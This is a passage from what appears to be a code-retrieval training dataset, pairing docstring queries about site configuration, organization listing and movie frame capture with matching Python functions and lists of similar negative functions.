"def test_site_configuration_post_save_receiver(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure an entry (and only one entry) is saved for SiteConfiguration\n assert len(site_configuration_history) == 1",
"def test_site_configuration_post_update_receiver_with_skip(self):\n # Add SiteConfiguration to database. By default, the site_valutes field contains only \"{}\".\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Update the SiteConfiguration we just created.\n site_configuration.site_values = {\"test\": \"test\"}\n save_siteconfig_without_historical_record(site_configuration) # Instead of .save().\n\n # Verify that the SiteConfiguration has been updated.\n assert site_configuration.get_value('test') == 'test'\n\n # Verify an entry to SiteConfigurationHistory was NOT added.\n # Make sure one entry (one for create and NONE for update) is saved for SiteConfiguration.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n assert len(site_configuration_history) == 1",
"def test_site_configuration_post_update_receiver(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n site_configuration.site_values = {'test': 'test'}\n site_configuration.save()\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure two entries (one for create and one for update) are saved for SiteConfiguration\n assert len(site_configuration_history) == 2",
"def test_add_site_dberror(self, mock_session):\n self.__db_error(mock_session)\n res = self.__client.post('/site/api/v1.0/site', data=self.TEST_SITE)\n self.assertEqual(res.status_code, 500)",
"def test_save_failures(self):\r\n\r\n records = self._get_records(5, keyspace=\"eggs\", column_family=\"bacon\")\r\n\r\n for record in records:\r\n record.is_modified = lambda: True\r\n record.valid = lambda: False\r\n self.object.append(record)\r\n\r\n self.assertRaises(ErrorMissingField, self.object.save)",
"def test_models_edx_save_problem_fail_with_valid_statement(statement):\n assert statement.event_type == \"save_problem_fail\"\n assert statement.page == \"x_module\"",
"def test_invalid_software_entry(self):\n with pytest.raises(ValueError):\n self.fh.software_history_entry = {\"invalid\": None}\n\n with pytest.raises(ValueError):\n self.fh.software_history_entry = {\"name\": None}",
"def testBacklogWithItemNotAdded(self):\n backlog = BacklogConfiguration(self.env, name=\"Global Backlog\")\n backlog.ticket_types=[Type.REQUIREMENT]\n backlog.save()\n # Create some tickets and add them to the Backlog\n b = self.bmm.get(name=\"Global Backlog\")\n t1 = self.teh.create_ticket(Type.REQUIREMENT, props={Key.BUSINESS_VALUE: '3000'})\n t_no = self.teh.create_ticket(Type.USER_STORY, props={Key.STORY_POINTS: '13'})\n t2 = self.teh.create_ticket(Type.REQUIREMENT, props={Key.BUSINESS_VALUE: '1200'})\n b1 = self.bmm.get(name=\"Global Backlog\")\n # Test that a belonging ticket is really belonging\n self.assert_contains(t2, b1)\n # Test if the external ticket, has been loaded into the Backlog\n self.assert_contains(t1, b1)\n # Test that the t_no, User Story is also not in the Backlog\n self.assert_not_contains(t_no, b1)",
"def _check_site_keys(self):\n self.sites = []\n for site_key in self.unique_site_keys:\n site_text = ', '.join([str(x) for x in site_key.values()])\n try:\n site = Site.objects.filter(**site_key)[0] # silent fail and grab first if not unique\n self.sites.append({'name':site_text, 'site':site})\n except IndexError:\n if self.data_sheet.site_type == 'coord-based':\n # just insert it \n lon = float(site_text.split('(')[1].split(' ')[0])\n lat = float(site_text.split(' ')[1].split(')')[0])\n point = Point(lon, lat)\n closest = impute_state_county(point)\n if not closest['error']:\n site, created = Site.objects.get_or_create(state=closest['state'], \n county=closest['county'], \n geometry=str(point),\n transaction=self.user_txn)\n if site:\n self.sites.append({'name':site_text, 'site':site})\n else:\n self.errors.append(\"\"\"%s\"\"\" % closest['error'])\n\n else:\n urlargs = urlencode(site_key) \n if urlargs:\n urlargs = \"?\" + urlargs\n\n self.errors.append(\"\"\"Site <em>'%s'</em> is not in the database. <br/>\n <button href=\"/site/create%s\" class=\"btn btn-mini create-site\" disabled> Create new site record </button>\n <!--<a href=\"/site/list\" class=\"btn btn-mini\"> Match to existing site record </a>-->\n \"\"\" % (site_text, urlargs ))\n self.sites.append({'name':site_text, 'site':None})\n\n if len(self.errors) > 0:\n site_form = CreateSiteForm()\n self.user_txn.delete()\n self.response = bulk_bad_request(self.form, self.request, \n self.errors, \n site_form=site_form, \n json=self.get_org_json())\n return False\n return True",
"def test_site_configuration_has_changed(self):\n # The database configuration timestamp is initialized as part\n # of the default data. In that case, it happened during the\n # package_setup() for this test run.\n last_update = Configuration.site_configuration_last_update(self._db)\n\n def ts():\n return Timestamp.value(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n timestamp_value = ts()\n eq_(timestamp_value, last_update)\n\n # Now let's call site_configuration_has_changed().\n #\n # Sending cooldown=0 ensures we can change the timestamp value\n # even though it changed less than one second ago.\n time_of_update = datetime.datetime.utcnow()\n site_configuration_has_changed(self._db, cooldown=0)\n\n # The Timestamp has changed in the database.\n assert ts() > timestamp_value\n\n # The locally-stored last update value has been updated.\n new_last_update_time = Configuration.site_configuration_last_update(\n self._db, timeout=0\n )\n assert new_last_update_time > last_update\n assert (new_last_update_time - time_of_update).total_seconds() < 1\n\n # Let's be sneaky and update the timestamp directly,\n # without calling site_configuration_has_changed(). This\n # simulates another process on a different machine calling\n # site_configuration_has_changed() -- they will know about the\n # change but we won't be informed.\n timestamp = Timestamp.stamp(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n\n # Calling Configuration.check_for_site_configuration_update\n # with a timeout doesn't detect the change.\n eq_(new_last_update_time,\n Configuration.site_configuration_last_update(self._db, timeout=60)\n )\n\n # But the default behavior -- a timeout of zero -- forces\n # the method to go to the database and find the correct\n # answer.\n newer_update = Configuration.site_configuration_last_update(\n self._db\n )\n assert newer_update > last_update\n\n # The Timestamp that tracks the last configuration update has\n # a cooldown; the default cooldown is 1 second. This means the\n # last update time will only be set once per second, to avoid\n # spamming the Timestamp with updates.\n\n # It's been less than one second since we updated the timeout\n # (with the Timestamp.stamp call). If this call decided that\n # the cooldown had expired, it would try to update the\n # Timestamp, and the code would crash because we're passing in\n # None instead of a database connection.\n #\n # But it knows the cooldown has not expired, so nothing\n # happens.\n site_configuration_has_changed(None)\n\n # Verify that the Timestamp has not changed (how could it,\n # with no database connection to modify the Timestamp?)\n eq_(newer_update,\n Configuration.site_configuration_last_update(self._db))",
"def test_update_history_using_put(self):\n pass",
"def test_set_last_timestamp_same(self, save_mock):\n self._config.last_timestamp = 1234567890\n save_mock.assert_not_called()",
"def test_write_record_update(self):\n # Assert task's config is not expected\n task = TaskRepository.fetch_task_by_id(self.url_task.id)\n self.assertNotEquals(task.config, {'url': 'hey'})\n\n # Update tasks's config\n task.config = {'url': 'hey'}\n TaskRepository.write_record(task)\n\n # Assert tasks' config is as expected\n task = TaskRepository.fetch_task_by_id(self.url_task.id)\n self.assertEquals(task.config, {'url': 'hey'})",
"def test_config_put(self):\n pass",
"def test_invalid_setting_key(self):\n ...",
"def test_update_not_existing_configuration(self):\n # create an instance of the API class\n api_instance = swagger_client.ConfigurationApi(\n swagger_client.ApiClient())\n cfg = SAMPLE_CFG\n\n # Start monitoring response time\n start = time.clock()\n\n # Add a new test configuration (to be modified later)\n api_response = api_instance.add_configuration(cfg)\n # End monitoring response time\n request_time = time.clock() - start\n\n self.assertLessEqual(request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))\n\n # Modifies some values of existing configuration\n # to create an updated invalid configuration\n updated_configuration = api_response\n updated_configuration.id = str(uuid.uuid4())\n updated_configuration.value = {\"answer\": 42}\n\n # Start monitoring response time\n start = time.clock()\n\n try:\n # UPDATES THE ADDED CONFIGURATION (main purpose of the test)\n api_instance.update_configuration(updated_configuration)\n except swagger_client.rest.ApiException as excp:\n if excp.status != 404:\n raise excp\n else:\n # End monitoring response time\n request_time = time.clock() - start\n\n self.assertLessEqual(\n request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))\n\n # Check if the error returned is the one expected\n self.assertEqual(excp.status, 404)\n return\n\n raise Exception(\"Configuration should not be updated\")",
"def test_add_not_valid_configuration(self):\n # create an instance of the API class\n api_instance = swagger_client.ConfigurationApi(\n swagger_client.ApiClient())\n cfg = swagger_client.NewConfiguration(\n name=\"GoogleSettings\",\n value=4)\n\n # Start monitoring response time\n start = time.clock()\n # Add a new test configuration\n try:\n api_instance.add_configuration(cfg)\n except swagger_client.rest.ApiException as excp:\n if excp.status != 400:\n raise excp\n else:\n request_time = time.clock() - start\n # End monitoring response time\n\n self.assertLessEqual(request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(\n request_time))\n\n # Check if the error returned is the one expected\n self.assertEqual(excp.status, 400)\n return\n\n raise Exception(\"Configuration should not be added\")",
"def test_update_unregistered_fail(collection, session):\n\n # Given\n\n table_config = TableConfig(name=\"name\", description=\"description\", datasets=[], rows=[], variables=[], columns=[],\n definition_uid = None)\n\n # When\n with pytest.raises(ValueError, match=\"Cannot update Table Config without a config_uid.\"):\n collection.update(table_config)",
"def test_failed_update_existing_build(self):"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test that get_all_orgs returns all orgs from site configuration.
|
def test_get_all_orgs(self):
expected_orgs = [self.test_config1['course_org_filter'], self.test_config2['course_org_filter']]
# add SiteConfiguration to database
SiteConfigurationFactory.create(
site=self.site,
site_values=self.test_config1
)
SiteConfigurationFactory.create(
site=self.site2,
site_values=self.test_config2
)
# Verify that get_all_orgs returns the orgs from all site configurations
self.assertCountEqual(SiteConfiguration.get_all_orgs(), expected_orgs)
|
[
"def test_get_all_orgs_returns_only_enabled(self):\n expected_orgs = [self.test_config2['course_org_filter']]\n # add SiteConfiguration to database\n SiteConfigurationFactory.create(\n site=self.site,\n site_values=self.test_config1,\n enabled=False,\n )\n SiteConfigurationFactory.create(\n site=self.site2,\n site_values=self.test_config2\n )\n\n # Test that the default value is returned if the value for the given key is not found in the configuration\n self.assertCountEqual(SiteConfiguration.get_all_orgs(), expected_orgs)",
"def test_get_orgs(self):\n # Fetch just one org by name\n parameters = {\n 'Name': \"'%s'\" % TEST_MS_MEMBER_ORG_NAME,\n }\n org_list = self.service.get_orgs(parameters=parameters)\n self.assertEqual(len(org_list), 1)\n self.assertEqual(type(org_list[0]), Organization)\n\n # @todo - test since_when parameter\n\n # Fetch all orgs using get_all=True\n # But limit to 1 result per iteration, 2 iterations\n org_list = self.service.get_orgs(limit_to=1, max_calls=2)\n self.assertEqual(len(org_list), 2)\n self.assertEqual(type(org_list[0]), Organization)\n\n # How does recursion handle the end?\n # 8055 records at the time of this test\n org_list = self.service.get_orgs(\n start_record=8000, limit_to=10)\n self.assertGreater(len(org_list), 1)\n self.assertEqual(type(org_list[0]), Organization)",
"def test_all_organizations(self):\n i = self.instance.all_organizations()\n self.get_next(i)\n\n self.session.get.assert_called_once_with(\n url_for(\"organizations\"), params={\"per_page\": 100}, headers={}\n )",
"def test_view_can_get_all_organizations(self):\n another_org = {\n \"name\": \"Andela\",\n \"description\": \"Train the next gen of tech leaders\"\n }\n self.client().post('/api/organizations/', data=self.org_data)\n self.client().post('/api/organizations/', data=another_org)\n\n # now get all the created orgs\n response = self.client().get('/api/organizations/')\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"Andela\", str(response.data))",
"def sample_orgs():\n org1 = Organization(_id=1000,\n url='org1.au',\n external_id='1000-org',\n name='Good Organization',\n domain_names=['org1.au'],\n created_at='2017-06-23T10:31:39 -10:00',\n details='LedaCorp',\n shared_tickets=True,\n tags=['tag100', 'tag200'])\n\n org2 = Organization(_id=2000,\n url='org2.au',\n external_id='2000-org',\n name='Bad Organization',\n domain_names=['org2.au'],\n created_at='2020-06-23T10:31:39 -10:00',\n details='PidaCorp',\n shared_tickets=False,\n tags=['tag200', 'tag400'])\n\n orgs_list = [org1, org2]\n return orgs_list",
"def test_all_organizations_per_page(self):\n i = self.instance.all_organizations(per_page=25)\n self.get_next(i)\n\n self.session.get.assert_called_once_with(\n url_for(\"organizations\"), params={\"per_page\": 25}, headers={}\n )",
"def organizations():",
"def gov_orgs():\n us_gov_github_orgs = set()\n\n gov_orgs_json = requests.get(\n \"https://government.github.com/organizations.json\",\n timeout=DEFAULT_REQUESTS_TIMEOUTS,\n ).json()\n\n us_gov_github_orgs.update(gov_orgs_json[\"governments\"][\"U.S. Federal\"])\n us_gov_github_orgs.update(\n gov_orgs_json[\"governments\"][\"U.S. Military and Intelligence\"]\n )\n us_gov_github_orgs.update(gov_orgs_json[\"research\"][\"U.S. Research Labs\"])\n\n return list(us_gov_github_orgs)",
"def get_github_orgs():\n gqlapi = gql.get_api()\n return gqlapi.query(GITHUB_ORGS_QUERY)[\"orgs\"]",
"def search_orgs(**kwargs):\n orgs = {'orgs': []}\n if kwargs.get('business_identifier', None):\n affiliation: AffiliationModel = AffiliationModel. \\\n find_affiliations_by_business_identifier(kwargs.get('business_identifier'))\n if affiliation:\n orgs['orgs'].append(Org(OrgModel.find_by_org_id(affiliation.org_id)).as_dict())\n elif kwargs.get('org_type', None):\n org_models = OrgModel.find_by_org_access_type(kwargs.get('org_type'))\n for org in org_models:\n orgs['orgs'].append(Org(org).as_dict())\n return orgs",
"def get_organizations(self):\n url = \"{}/organizations\".format(self.API_URL)\n if self.debug:\n self.print(\"Sending GET request to URL {}\".format(url))\n r = self.session.get(url)\n r.raise_for_status()\n return r.json()",
"def get_managed_requester_orgs(cache=True):\n\n db = current.db\n\n auth = current.auth\n s3db = current.s3db\n\n organisation_ids = None\n\n user = auth.user\n ORG_ADMIN = auth.get_system_roles().ORG_ADMIN\n if user and ORG_ADMIN in user.realms:\n realms = user.realms.get(ORG_ADMIN)\n if realms:\n from .config import TESTSTATIONS\n otable = s3db.org_organisation\n mtable = s3db.org_group_membership\n gtable = s3db.org_group\n ltable = s3db.org_organisation_organisation_type\n rtable = s3db.req_requester_category\n\n join = [mtable.on((mtable.organisation_id == otable.id) & \\\n (mtable.deleted == False) & \\\n (gtable.id == mtable.group_id) & \\\n (gtable.name == TESTSTATIONS)),\n rtable.on((ltable.organisation_id == otable.id) & \\\n (ltable.deleted == False) & \\\n (rtable.organisation_type_id == ltable.organisation_type_id) & \\\n (rtable.item_category_id != None) & \\\n (rtable.deleted == False)),\n ]\n\n query = otable.pe_id.belongs(realms)\n rows = db(query).select(otable.id,\n cache = s3db.cache if cache else None,\n groupby = otable.id,\n join = join,\n )\n if rows:\n organisation_ids = list(set(row.id for row in rows))\n\n return organisation_ids",
"def test_organization_resources_get(self):\n pass",
"def test_all_repositories(self):\n i = self.instance.all_repositories()\n self.get_next(i)\n\n self.session.get.assert_called_once_with(\n url_for(\"repositories\"), params={\"per_page\": 100}, headers={}\n )",
"def list(self):\n url = urljoin(self.client.base_url, 'organizations')\n url = furl(url).add({'apikey': self.client.api_key}).url\n resp = requests.get(url)\n return resp.json()",
"def test_organizations(self):\n self.assert_requires_auth(self.instance.organizations)",
"def testOrgAdminsForOrg(self):\n org_admin_properties = {'org_admin_for': [self.foo_org.key()],\n 'is_org_admin': True}\n\n foo_org_admin1 = seeder_logic.seed(GCIProfile, org_admin_properties)\n foo_org_admin2 = seeder_logic.seed(GCIProfile, org_admin_properties)\n\n org_admin_properties['org_admin_for'] = [self.bar_org.key()]\n bar_org_admin = seeder_logic.seed(GCIProfile, org_admin_properties)\n\n # Check for self.foo_org (two admins)\n expected = [foo_org_admin1.key(), foo_org_admin2.key()]\n actual = [profiles.key()\n for profiles in profile_logic.orgAdminsForOrg(self.foo_org)]\n self.assertEqual(expected, actual)\n\n # Check for self.bar_org (just one admin)\n expected = [bar_org_admin.key()]\n actual = [profiles.key()\n for profiles in profile_logic.orgAdminsForOrg(self.bar_org)]\n self.assertEqual(expected, actual)",
"def test_get_organization_memberships(self):\n pass",
"def get_quay_orgs():\n gqlapi = gql.get_api()\n return gqlapi.query(QUAY_ORGS_QUERY)[\"quay_orgs\"]"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test that get_all_orgs returns only those orgs whose configurations are enabled.
|
def test_get_all_orgs_returns_only_enabled(self):
expected_orgs = [self.test_config2['course_org_filter']]
# add SiteConfiguration to database
SiteConfigurationFactory.create(
site=self.site,
site_values=self.test_config1,
enabled=False,
)
SiteConfigurationFactory.create(
site=self.site2,
site_values=self.test_config2
)
# Verify that get_all_orgs returns only the orgs from enabled site configurations
self.assertCountEqual(SiteConfiguration.get_all_orgs(), expected_orgs)
|
[
"def test_get_all_orgs(self):\n expected_orgs = [self.test_config1['course_org_filter'], self.test_config2['course_org_filter']]\n # add SiteConfiguration to database\n SiteConfigurationFactory.create(\n site=self.site,\n site_values=self.test_config1\n )\n SiteConfigurationFactory.create(\n site=self.site2,\n site_values=self.test_config2\n )\n\n # Test that the default value is returned if the value for the given key is not found in the configuration\n self.assertCountEqual(SiteConfiguration.get_all_orgs(), expected_orgs)",
"def test_get_orgs(self):\n # Fetch just one org by name\n parameters = {\n 'Name': \"'%s'\" % TEST_MS_MEMBER_ORG_NAME,\n }\n org_list = self.service.get_orgs(parameters=parameters)\n self.assertEqual(len(org_list), 1)\n self.assertEqual(type(org_list[0]), Organization)\n\n # @todo - test since_when parameter\n\n # Fetch all orgs using get_all=True\n # But limit to 1 result per iteration, 2 iterations\n org_list = self.service.get_orgs(limit_to=1, max_calls=2)\n self.assertEqual(len(org_list), 2)\n self.assertEqual(type(org_list[0]), Organization)\n\n # How does recursion handle the end?\n # 8055 records at the time of this test\n org_list = self.service.get_orgs(\n start_record=8000, limit_to=10)\n self.assertGreater(len(org_list), 1)\n self.assertEqual(type(org_list[0]), Organization)",
"def test_all_organizations(self):\n i = self.instance.all_organizations()\n self.get_next(i)\n\n self.session.get.assert_called_once_with(\n url_for(\"organizations\"), params={\"per_page\": 100}, headers={}\n )",
"def sample_orgs():\n org1 = Organization(_id=1000,\n url='org1.au',\n external_id='1000-org',\n name='Good Organization',\n domain_names=['org1.au'],\n created_at='2017-06-23T10:31:39 -10:00',\n details='LedaCorp',\n shared_tickets=True,\n tags=['tag100', 'tag200'])\n\n org2 = Organization(_id=2000,\n url='org2.au',\n external_id='2000-org',\n name='Bad Organization',\n domain_names=['org2.au'],\n created_at='2020-06-23T10:31:39 -10:00',\n details='PidaCorp',\n shared_tickets=False,\n tags=['tag200', 'tag400'])\n\n orgs_list = [org1, org2]\n return orgs_list",
"def test_view_can_get_all_organizations(self):\n another_org = {\n \"name\": \"Andela\",\n \"description\": \"Train the next gen of tech leaders\"\n }\n self.client().post('/api/organizations/', data=self.org_data)\n self.client().post('/api/organizations/', data=another_org)\n\n # now get all the created orgs\n response = self.client().get('/api/organizations/')\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"Andela\", str(response.data))",
"def get_managed_requester_orgs(cache=True):\n\n db = current.db\n\n auth = current.auth\n s3db = current.s3db\n\n organisation_ids = None\n\n user = auth.user\n ORG_ADMIN = auth.get_system_roles().ORG_ADMIN\n if user and ORG_ADMIN in user.realms:\n realms = user.realms.get(ORG_ADMIN)\n if realms:\n from .config import TESTSTATIONS\n otable = s3db.org_organisation\n mtable = s3db.org_group_membership\n gtable = s3db.org_group\n ltable = s3db.org_organisation_organisation_type\n rtable = s3db.req_requester_category\n\n join = [mtable.on((mtable.organisation_id == otable.id) & \\\n (mtable.deleted == False) & \\\n (gtable.id == mtable.group_id) & \\\n (gtable.name == TESTSTATIONS)),\n rtable.on((ltable.organisation_id == otable.id) & \\\n (ltable.deleted == False) & \\\n (rtable.organisation_type_id == ltable.organisation_type_id) & \\\n (rtable.item_category_id != None) & \\\n (rtable.deleted == False)),\n ]\n\n query = otable.pe_id.belongs(realms)\n rows = db(query).select(otable.id,\n cache = s3db.cache if cache else None,\n groupby = otable.id,\n join = join,\n )\n if rows:\n organisation_ids = list(set(row.id for row in rows))\n\n return organisation_ids",
"def test_all_organizations_per_page(self):\n i = self.instance.all_organizations(per_page=25)\n self.get_next(i)\n\n self.session.get.assert_called_once_with(\n url_for(\"organizations\"), params={\"per_page\": 25}, headers={}\n )",
"def organizations():",
"def testOrgAdminsForOrg(self):\n org_admin_properties = {'org_admin_for': [self.foo_org.key()],\n 'is_org_admin': True}\n\n foo_org_admin1 = seeder_logic.seed(GCIProfile, org_admin_properties)\n foo_org_admin2 = seeder_logic.seed(GCIProfile, org_admin_properties)\n\n org_admin_properties['org_admin_for'] = [self.bar_org.key()]\n bar_org_admin = seeder_logic.seed(GCIProfile, org_admin_properties)\n\n # Check for self.foo_org (two admins)\n expected = [foo_org_admin1.key(), foo_org_admin2.key()]\n actual = [profiles.key()\n for profiles in profile_logic.orgAdminsForOrg(self.foo_org)]\n self.assertEqual(expected, actual)\n\n # Check for self.bar_org (just one admin)\n expected = [bar_org_admin.key()]\n actual = [profiles.key()\n for profiles in profile_logic.orgAdminsForOrg(self.bar_org)]\n self.assertEqual(expected, actual)",
"def test_organizations(self):\n self.assert_requires_auth(self.instance.organizations)",
"def search_orgs(**kwargs):\n orgs = {'orgs': []}\n if kwargs.get('business_identifier', None):\n affiliation: AffiliationModel = AffiliationModel. \\\n find_affiliations_by_business_identifier(kwargs.get('business_identifier'))\n if affiliation:\n orgs['orgs'].append(Org(OrgModel.find_by_org_id(affiliation.org_id)).as_dict())\n elif kwargs.get('org_type', None):\n org_models = OrgModel.find_by_org_access_type(kwargs.get('org_type'))\n for org in org_models:\n orgs['orgs'].append(Org(org).as_dict())\n return orgs",
"def get_github_orgs():\n gqlapi = gql.get_api()\n return gqlapi.query(GITHUB_ORGS_QUERY)[\"orgs\"]",
"def gov_orgs():\n us_gov_github_orgs = set()\n\n gov_orgs_json = requests.get(\n \"https://government.github.com/organizations.json\",\n timeout=DEFAULT_REQUESTS_TIMEOUTS,\n ).json()\n\n us_gov_github_orgs.update(gov_orgs_json[\"governments\"][\"U.S. Federal\"])\n us_gov_github_orgs.update(\n gov_orgs_json[\"governments\"][\"U.S. Military and Intelligence\"]\n )\n us_gov_github_orgs.update(gov_orgs_json[\"research\"][\"U.S. Research Labs\"])\n\n return list(us_gov_github_orgs)",
"def organizations(self):\n from organization import Organization # avoid circular import\n\n # lookup using new incidents field\n orgs = list(\n Organization.all().filter('incidents', self.key())\n .filter('org_verified', True)\n .filter('is_active', True)\n )\n\n # build list of id and look for global admin\n org_ids = set()\n seen_global_admin = False\n for org in orgs:\n if org.is_global_admin:\n seen_global_admin = True\n org_id = org.key().id()\n if org_id not in org_ids:\n org_ids.add(org_id)\n\n # check legacy incident field\n legacy_field_orgs = Organization.all().filter('incident', self.key()) \\\n .filter('org_verified', True) \\\n .filter('is_active', True)\n for org in legacy_field_orgs:\n if org.key().id() not in org_ids:\n orgs.append(org)\n\n # prepend global admin if not encountered\n if not seen_global_admin:\n orgs = (\n list(Organization.all().filter('name', 'Admin')) +\n orgs\n )\n return orgs",
"def is_all_org_admin(self, u):\n return not self.user_organizations(u).exclude(pk__in=Organization.accessible_pk_qs(self.user, 'admin_role')).exists()",
"def test_get_organization_memberships(self):\n pass",
"def test_organization_resources_get(self):\n pass",
"def test_filter_non_exist_registry(self):\n\n org1 = Organization.objects.create(name='Example')\n org2 = Organization.objects.create(name='Bitergia')\n org3 = Organization.objects.create(name='LibreSoft')\n\n client = graphene.test.Client(schema)\n test_query = SH_ORGS_QUERY_FILTER % 'Test'\n executed = client.execute(test_query,\n context_value=self.context_value)\n\n orgs = executed['data']['organizations']['entities']\n self.assertListEqual(orgs, [])",
"def get_organizations(self):\n url = \"{}/organizations\".format(self.API_URL)\n if self.debug:\n self.print(\"Sending GET request to URL {}\".format(url))\n r = self.session.get(url)\n r.raise_for_status()\n return r.json()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
A tuple (width,height) in pixels of a movie frame.
|
def frame_size(self):
return self.display.width, self.display.height
|
[
"def frameSize(self):\n size = None\n if self.isVideo():\n if 'width' in self.__dict__ and 'height' in self.__dict__:\n try:\n size = (int(self.__dict__['width']),int(self.__dict__['height']))\n except Exception as e:\n pass\n size = (0,0)\n return size",
"def get_image_size(frame: np.array) -> Tuple[int, int]:\n image_size = (frame.shape[1], frame.shape[0]) # width, height\n return image_size",
"def get_frame_size(self):\n return (self.frame.shape[1], self.frame.shape[0])",
"def _size(self):\n xpixels = ctypes.c_int32()\n ypixels = ctypes.c_int32()\n sdk.GetDetector(ctypes.byref(xpixels), ctypes.byref(ypixels))\n self.width = xpixels.value\n self.height = ypixels.value\n self.pixels = xpixels.value * ypixels.value\n return (xpixels.value, ypixels.value)",
"def size(self) -> tuple:\n return self.width, self.height",
"def GetFrameSize(self):\n ...",
"def _get_size(self):\n if 'height' not in self or 'width' not in self:\n return None\n width = int(float(self.params['width'])) # allow float sizes (100.0), but truncate decimals\n height = int(float(self.params['height']))\n return (width, height)",
"def frame_width(self):\n # type: () -> int\n return self._frame_width",
"def get_dimensions(self):\t\t\n\t\t\n\t\treturn (self.x, self.y, self.w, self.h)",
"def get_size(self):\n assert self.__texture is not None\n return (self.__width, self.__height)",
"def size(self):\n return (len(self.pixels[0]), len(self.pixels[0][0]))",
"def get_dimensions(input_file):\n deets = get_video_details(input_file)\n dimensions = deets['width'],deets['height']\n width = int(dimensions[0])\n height = int(dimensions[1])\n return width, height",
"def frame_height(self):\n # type: () -> int\n return self._frame_height",
"def get_image_size_and_frames_count(path: str) -> Tuple[Tuple[int, int], int]:\n import skvideo.io\n\n vreader = skvideo.io.FFmpegReader(path)\n vlength = vreader.getShape()[0]\n img_height = vreader.getShape()[1]\n img_width = vreader.getShape()[2]\n\n img_size = (img_height, img_width)\n\n return img_size, vlength",
"def resolution_of_videofile(self):\n p = self.probe()\n assert 'streams' in p and len(['streams']) > 0\n (H,W) = (p['streams'][0]['height'], p['streams'][0]['width']) # (height, width) in pixels\n return (W,H) if ('tags' in p['streams'][0] and 'rotate' in p['streams'][0]['tags'] and p['streams'][0]['tags']['rotate'] in ['90','270']) else (H,W)",
"def _get_wh(self):\n return self._source.width, self._source.height",
"def get_dimensions(self):\n\n\t\treturn (self._x, self._y, self._w, self._h)",
"def FrameSize(self):\n return self._FrameSize",
"def get_frame_shape(movie_file: PathType):\n cap = cv2.VideoCapture(str(movie_file))\n success, frame = cap.read()\n cap.release()\n return frame.shape"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Grab the image information from the display and save as a movie frame. The keyword arguments are not being used in the subclass.
|
def grab_frame(self, **savefig_kwargs):
try:
image = pyglet.image.get_buffer_manager().get_color_buffer().get_image_data()
self._proc.stdin.write(image.get_data('RGBA',
-4 * self.display.width))
except RuntimeError:
out, err = self._proc.communicate()
print('MovieWriter -- Error ')
print('running proc:\n%s\n%s' % (out, err))
raise
|
[
"def saveFrame(self, filename):\n\t\tself.frameList.append(filename)\n\t\tvisualizer = self.visualizer\n\t\timageType = self.imageType\n\t\tLogging.info(\"Saving screenshot to \", filename, kw = \"visualizer\")\n\t\tcomm = \"visualizer.getCurrentMode().saveSnapshot(filename)\"\n\t\teval(comm)",
"def saveFrame(self):\n # Needs to be completed\n \n # Ask the user for the destination file\n dest = QtGui.QFileDialog.getSaveFileName(self, \"Save frame as...\", '', 'Images (*.png *.gif *.jpg *.jpeg)')\n # Grab and save a frame in the given file\n self.gui.video.device.save(str(dest))",
"def show(self, name: str, frame):\n self.putImage(name, frame)",
"def capture(self):\n self.camera = self.ids['camera']\n timestr = time.strftime(\"%Y%m%d_%H%M%S\")\n self.camera.export_to_png(\"IMG_{}.png\".format(timestr))\n print(\"Captured\")",
"def display(self):\n self.o.display_image(self.image)",
"def save_movie( gsd_file,output_file,resolution,file_save=False,down_sample=1):\n path_tracer = fresnel.tracer.Path(device,resolution[0],resolution[1])\n\n f = gsd.fl.GSDFile(gsd_file, 'rb')\n t = gsd.hoomd.HOOMDTrajectory(f)\n\n a = render_sphere_frame(frame=t[0],path_tracer=path_tracer);\n\n if tuple(map(int, (PIL.__version__.split(\".\")))) < (3,4,0):\n print(\"Warning! Movie display output requires pillow 3.4.0 or newer.\")\n print(\"Older versions of pillow may only display the first frame.\")\n\n im0 = PIL.Image.fromarray(a[:,:, 0:3], mode='RGB').convert(\"P\", palette=PIL.Image.ADAPTIVE);\n ims = [];\n points = numpy.linspace(1,len(t)-1,(len(t)-1)/down_sample);\n print(points)\n for point in points:\n f = t[int(numpy.floor(point))];\n a = render_sphere_frame(frame=f,path_tracer=path_tracer);\n im = PIL.Image.fromarray(a[:,:, 0:3], mode='RGB')\n im_p = im.quantize(palette=im0);\n ims.append(im_p)\n if file_save:\n if not os.path.exists(os.path.dirname(output_file)):\n os.makedirs(os.path.dirname(output_file),exist_ok=True);\n\n im0.save(output_file, 'gif', save_all=True, append_images=ims, duration=1500, loop=0)\n\n return (f)",
